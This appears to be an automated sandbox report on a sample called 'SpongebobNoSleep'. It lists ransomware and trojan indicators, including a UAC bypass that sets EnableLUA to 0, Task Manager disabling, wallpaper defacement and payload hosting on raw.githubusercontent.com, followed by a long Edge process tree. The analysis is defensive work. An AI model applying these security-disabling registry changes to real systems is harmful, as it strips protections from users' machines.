hxxps://www[.]hybrid-analysis[.]com

Analysis

max time kernel
304s
max time network
306s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
11-01-2025 20:49

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://www.hybrid-analysis.com

Score

10^/10

discovery evasion ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	raw.githubusercontent.com
62	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"	reg.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/memory/2596-789-0x0000000000400000-0x000000000079B000-memory.dmp	upx
behavioral4/memory/2596-802-0x0000000000400000-0x000000000079B000-memory.dmp	upx
behavioral4/memory/2596-839-0x0000000000400000-0x000000000079B000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpongebobNoSleep.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
4992	reg.exe
3416	reg.exe
4200	reg.exe

NTFS ADS 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep (2).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep (5).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep (6).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep (3).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep (7).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep (1).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpongebobNoSleep (4).zip:Zone.Identifier	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
964	msedge.exe
964	msedge.exe
1292	msedge.exe
1292	msedge.exe
656	identity_helper.exe
656	identity_helper.exe
4064	msedge.exe
4064	msedge.exe
1448	msedge.exe
1448	msedge.exe
1448	msedge.exe
1448	msedge.exe
4668	msedge.exe
4668	msedge.exe
1576	msedge.exe
1576	msedge.exe
1320	msedge.exe
1320	msedge.exe
3452	msedge.exe
3452	msedge.exe
2780	msedge.exe
2780	msedge.exe
1620	msedge.exe
1620	msedge.exe
444	msedge.exe
444	msedge.exe
3176	msedge.exe
3176	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3388	shutdown.exe
Token: SeRemoteShutdownPrivilege	3388	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe
1292	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1548	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 4884	1292	msedge.exe	77
PID 1292 wrote to memory of 4884	1292	msedge.exe	77
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 3976	1292	msedge.exe	78
PID 1292 wrote to memory of 964	1292	msedge.exe	79
PID 1292 wrote to memory of 964	1292	msedge.exe	79
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80
PID 1292 wrote to memory of 1344	1292	msedge.exe	80

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.hybrid-analysis.com
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc89243cb8,0x7ffc89243cc8,0x7ffc89243cd8
  2⤵
  PID:4884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1824 /prefetch:2
  2⤵
  PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
  2⤵
  PID:1344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
  2⤵
  PID:432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
  2⤵
  PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3424 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
  2⤵
  PID:1912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1724 /prefetch:1
  2⤵
  PID:2332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
  2⤵
  PID:3340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
  2⤵
  PID:4036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1168 /prefetch:1
  2⤵
  PID:3824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
  2⤵
  PID:1152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4628 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:2728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
  2⤵
  PID:248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
  2⤵
  PID:892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7144 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6264 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6960 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7028 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7104 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1856,5479633607117994057,12369895216758539584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7324 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3176

C:\Windows\System32\CompPkgSrv.exe
